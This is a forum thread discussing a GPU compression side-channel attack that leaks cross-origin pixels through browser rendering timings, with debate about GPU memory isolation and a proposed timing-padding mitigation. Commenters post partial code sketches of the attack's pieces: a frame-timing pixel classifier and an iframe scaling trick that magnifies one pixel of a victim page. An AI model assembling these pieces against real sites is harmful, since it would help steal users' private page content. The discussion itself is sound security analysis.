I had seen this happening. I was running WebGL shaders in Chrome in a pipeline where I was passing the result of the previous pass to be processed by the next, and sometimes I would get portions of other app windows inside the result, with the post-processing WebGL shader filter applied to them, which was crazy. I thought it was just a glitch on my system and couldn't replicate it reliably; it would just happen sometimes. Good to know it wasn't just my system :)
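For context, the pipeline was roughly this kind of ping-pong between two framebuffer-backed textures, each pass sampling the previous pass's output (a simplified sketch, not the actual code; the full-screen-quad attribute setup is omitted and `passes` stands in for the compiled filter programs):

    // Two render targets; each filter pass reads the previous result and writes the other.
    const canvas = document.createElement('canvas');
    const gl = canvas.getContext('webgl')!;

    function makeTarget(w: number, h: number) {
      const tex = gl.createTexture();
      gl.bindTexture(gl.TEXTURE_2D, tex);
      // Allocate storage with no initial data.
      gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA, w, h, 0, gl.RGBA, gl.UNSIGNED_BYTE, null);
      gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MIN_FILTER, gl.LINEAR);
      const fbo = gl.createFramebuffer();
      gl.bindFramebuffer(gl.FRAMEBUFFER, fbo);
      gl.framebufferTexture2D(gl.FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.TEXTURE_2D, tex, 0);
      return { tex, fbo };
    }

    function runPipeline(passes: { program: WebGLProgram }[]) {
      let src = makeTarget(512, 512);
      let dst = makeTarget(512, 512);
      for (const pass of passes) {
        gl.bindFramebuffer(gl.FRAMEBUFFER, dst.fbo);
        gl.useProgram(pass.program);
        gl.bindTexture(gl.TEXTURE_2D, src.tex);  // previous result feeds the next shader
        gl.drawArrays(gl.TRIANGLES, 0, 6);       // full-screen quad (attribute setup omitted)
        [src, dst] = [dst, src];                 // swap targets for the next pass
      }
    }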
That’s something different: that’s just a straight-up bug in the driver or compositor, directly allowing access to the graphics memory of other programs. It’s stupid that such bugs occur, but occur they do. GPU drivers especially have historically been mindbogglingly badly implemented, though most of the worst problems are fully ironed out now. But what’s being reported here is far more subtle, a side-channel attack based on data compression.
I don't think this was the same vulnerability that you saw. I think many operations in shaders produce "unspecified" pixel values, which in practice often just manifests as getting pixel values from some previously freed buffer that hasn't been overwritten yet.
I believe WebGL should remove this kind of side channel, but implementations can have bugs.
Also, GPU vendors should consider multi-user usage anyway and make these side channels impossible outside of WebGL too. I doubt that they care; they would rather chase performance numbers.
When was this? When WebGL was a new thing, there was no protection whatsoever, and uninitialized textures and buffers could contain stale data from other processes. But this was fixed about a decade ago.
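Back then, something as simple as allocating texture storage without supplying data was enough to hand you someone else's leftover memory (a sketch; current implementations are required to behave as if the storage is zero-initialized):

    const canvas = document.createElement('canvas');
    const gl = canvas.getContext('webgl')!;
    const tex = gl.createTexture();
    gl.bindTexture(gl.TEXTURE_2D, tex);
    // No pixel data supplied. The spec now requires this to read back as zeros,
    // but early implementations could return whatever was left in that memory.
    gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA, 256, 256, 0, gl.RGBA, gl.UNSIGNED_BYTE, null);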
In any case, what you saw is not what is described in this article; the attack here extracts pixel data very slowly by measuring GPU timings.
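The measurement loop in this kind of attack is roughly of this shape (a sketch of the general idea only, not the paper's code; the filter/magnification setup is passed in as a hypothetical callback, and the threshold has to be calibrated per machine):

    // One bit leaks per batch of timed frames: a compressible (uniform) set of tiles
    // renders faster than an incompressible (noisy) one.
    function timeOneFrame(): Promise<number> {
      return new Promise(resolve => {
        requestAnimationFrame(t0 => {
          requestAnimationFrame(t1 => resolve(t1 - t0));
        });
      });
    }

    async function classifyPixel(setUpFilterForPixel: (x: number, y: number) => void,
                                 x: number, y: number,
                                 threshold: number, samples = 50): Promise<number> {
      setUpFilterForPixel(x, y);          // hypothetical helper: magnify + filter pixel (x, y)
      let total = 0;
      for (let i = 0; i < samples; i++) {
        total += await timeOneFrame();
      }
      // Slower average frame => incompressible tiles => classify the pixel as one value.
      return total / samples > threshold ? 1 : 0;
    }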
> I thought it was just a glitch on my system and couldn't replicate it reliably, it would just happen sometimes. Good to know it wasn't just my system :)
Similar to this attack, then: it seems it can take up to 30 minutes on an AMD system and up to 215 minutes on an Intel system, and it's still not 100% accurate.
This is beautiful, and horrifying, all at the same time.
I'm reminded of the paper that reverse-engineered the ECC encoding to demonstrate how you could Rowhammer through it - just a lot of tedious RE work as a prerequisite to making the point they wanted to make.
This is what, the third class of side-channel attacks that needs to be mitigated?
I think at some point we may have to stop and rethink the entire modern computing architecture; either that or stop running untrusted code by default. It seems these issues will inevitably come up again and again.
You need to trust at least the hardware manufacturer. If that is yourself, then you probably don't have the equipment needed to make hardware fast enough to run modern software or services practically.
I feel like something is rather wrong with the security model that allows origin A to render a filtered version of a non-CORS-authorized image from origin B. Why is this useful? (Other than enabling awesome attacks like this.)
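The asymmetry is easy to see (a sketch with a made-up URL): origin A gets to render and filter the cross-origin image however it likes; it just can't read the pixels back through the sanctioned API.

    // Filtering a non-CORS image from another origin is allowed...
    const img = new Image();
    img.src = 'https://origin-b.example/secret.png';     // hypothetical non-CORS-enabled image
    img.style.filter = 'contrast(800%) grayscale(100%)';
    document.body.appendChild(img);

    // ...but reading the rendered pixels back is not:
    img.onload = () => {
      const c = document.createElement('canvas');
      c.width = img.naturalWidth;
      c.height = img.naturalHeight;
      const ctx = c.getContext('2d')!;
      ctx.drawImage(img, 0, 0);            // taints the canvas (no CORS approval)
      try {
        ctx.getImageData(0, 0, 1, 1);      // throws SecurityError on a tainted canvas
      } catch (e) {
        console.log('readback blocked:', e);  // the side channel leaks what this API refuses to give
      }
    };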
With our central processing units, we developed a process model where each process is isolated, memory-wise, from every other. And then we went on to destroy that model with threads... but I digress. This process-isolation culture was probably born from shared systems where each user needed to be isolated from the others, but it has served us well in providing robust single-user systems, and it has proved critical with the move back to shared cloud computing.
Graphics processing units have no concept of memory isolation, and no culture of wanting it. They were high-performance units for a single user only. At this point, trying to introduce isolation levels would probably be a lost cause; many people would be very unhappy about the performance hit that would be required.
But yeah a GPU in a shared environment spooks me as well.
All modern GPUs have isolated memory contexts, with a full CPU-like virtual memory address space and page tables for each user context. It's not possible to (directly) read data from another context. As far as I can tell, your comment is simply incorrect in claiming that GPUs don't support this.
From the description given, I assume this is using timing differences to tell the size of each compressed tile, which gives you info on its contents. This is certainly not helped by the ability of an apparently untrusted page to apply a transform to an embedded target that the security model would normally disallow reading pixels from, amplifying the data from this side channel. Without that it's "just" another side-channel attack.
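As I understand it, the amplification step looks roughly like this (a rough sketch with a made-up URL; the real attack combines it with a stack of SVG filters chosen to stress the compressor):

    // Magnify a single pixel of the embedded target so its value determines the contents
    // of a large screen area, i.e. many compression tiles, turning a one-pixel difference
    // into a measurable rendering-time difference.
    function magnifyTargetPixel(x: number, y: number): HTMLElement {
      const viewport = document.createElement('div');
      viewport.style.cssText = 'overflow: hidden; width: 1000px; height: 1000px;';

      const frame = document.createElement('iframe');
      frame.src = 'https://victim.example/';           // hypothetical cross-origin target
      frame.style.width = '1000px';
      frame.style.height = '1000px';
      frame.style.transformOrigin = `${x}px ${y}px`;   // keep the chosen pixel fixed in place...
      frame.style.transform = 'scale(2000)';           // ...and blow its neighbourhood up to fill the viewport

      viewport.appendChild(frame);
      document.body.appendChild(viewport);
      return viewport;
    }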
Ah, consider me corrected then. I haven't done much GPU programming (I guess it shows). I was under the impression that there was no virtual memory and that any illusion of an isolated process was solely due to driver trickery.
Yeah, I had to check if it's one of those bots. It's fascinating to me that a person has the urge to spit out two paragraphs devoid of any correct information or value for that matter, as an answer to a question online -- as if it can't be looked up or researched easily!
No problem - though virtual memory was required by the DX10 spec, so it's not like it's a new thing. And even before that, many GPUs had (more limited) memory management units/memory protection.
All of them. GPU memory is fully virtualized, if for nothing else then to easily support multiple applications running natively on it, since GPUs aren't used only for display and rendering anymore, where multiple clients could be handled solely by the compositor.
Most of the driver has also been moved into user space, at least on Windows and macOS; I'm not fully versed in the state of user- vs. kernel-space display drivers on Linux these days.
For clarity: applications that don't know how to use virtual memory will still operate in a segmented mode where they access physical memory directly. However, under Windows at least, these days (and for a while now) even the segmented mode is emulated; you'd need to run your engine entirely on bare metal to access physical memory directly via segment addressing.
Money quote from the abstract: "Compression induces data-dependent DRAM traffic and cache utilization, which can be measured through side-channel analysis."
This attack vector doesn't seem to be very GPU-specific. Maybe the memory access pattern and the compression used by the GPU drivers combined with the sensitivity of the information being transferred make the GPU drivers an attractive target for this attack vector.
But in principle this attack vector could be present for other processes without the GPU being involved at all, couldn't it? The CPU cache is a big side channel across processes run on the CPU.
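To make the data dependence concrete with plain software compression (nothing GPU-specific here; the GPU's lossless framebuffer compression is proprietary, and gzip is just an illustration): uniform data shrinks to almost nothing while random data doesn't, and anything observable that tracks that size becomes a side channel.

    // Compressed size is data-dependent: any observable that correlates with it
    // (DRAM traffic, cache use, time) leaks information about the contents.
    async function compressedSize(bytes: Uint8Array): Promise<number> {
      const stream = new Blob([bytes]).stream().pipeThrough(new CompressionStream('gzip'));
      const compressed = await new Response(stream).arrayBuffer();
      return compressed.byteLength;
    }

    const uniform = new Uint8Array(1 << 20);                                    // all zeros: highly compressible
    const noise = new Uint8Array(1 << 20).map(() => (Math.random() * 256) | 0); // incompressible

    compressedSize(uniform).then(n => console.log('uniform:', n));  // a few KB
    compressedSize(noise).then(n => console.log('noise:', n));      // roughly 1 MB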
Unless the traffic has some correlation with the contents - e.g. the data is compressed, so "simpler" data causes less traffic - it doesn't seem directly relevant. As far as I'm aware, there's no data dependence on CPU caches or DRAM buses, with one exception: zeroing of cache lines is often special-cased. That might be useful for some very specific attacks?
Also, this might be usable as an attack on an OS that uses some sort of compressed RAM or swap: evicting a page from a target process's working set could cause something measurable, telling you how well the compression algorithm happened to cope and thus something about the contents.
But one of the big parts of this is the iframe transforms allowing you to amplify the "interesting" data from the noise across security boundaries (i.e. turning a single pixel into a large number of compressed tiles, making the attack much simpler). That feels more like a software issue than a hardware one. I'm not sure whether something similar can be done on the CPU side of things, and whether that's strictly required to make this attack possible, or just makes it easier.
Note that this can be fully mitigated in software: the browser only needs to hide the latency difference, say by first measuring an upper bound with a random (incompressible) pattern and then padding the observable time up to that bound.
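Something like this, in other words (a sketch of my understanding, not an actual browser patch; `renderFiltered` is a hypothetical stand-in for whatever filtered-drawing operation the attacker can time):

    // Calibrate a worst-case time once on an incompressible pattern, then pad every
    // filtered render up to that bound so its duration no longer depends on the data.
    async function calibrateUpperBound(renderFiltered: (pixels: ImageData) => Promise<void>,
                                       width: number, height: number): Promise<number> {
      const noise = new ImageData(width, height);
      for (let i = 0; i < noise.data.length; i++) {
        noise.data[i] = (Math.random() * 256) | 0;   // worst case for lossless compression
      }
      const t0 = performance.now();
      await renderFiltered(noise);
      return performance.now() - t0;
    }

    async function renderWithConstantTiming(renderFiltered: (pixels: ImageData) => Promise<void>,
                                            pixels: ImageData, upperBound: number): Promise<void> {
      const t0 = performance.now();
      await renderFiltered(pixels);
      const elapsed = performance.now() - t0;
      if (elapsed < upperBound) {
        // Hide the compression-dependent difference behind the calibrated bound.
        await new Promise(resolve => setTimeout(resolve, upperBound - elapsed));
      }
    }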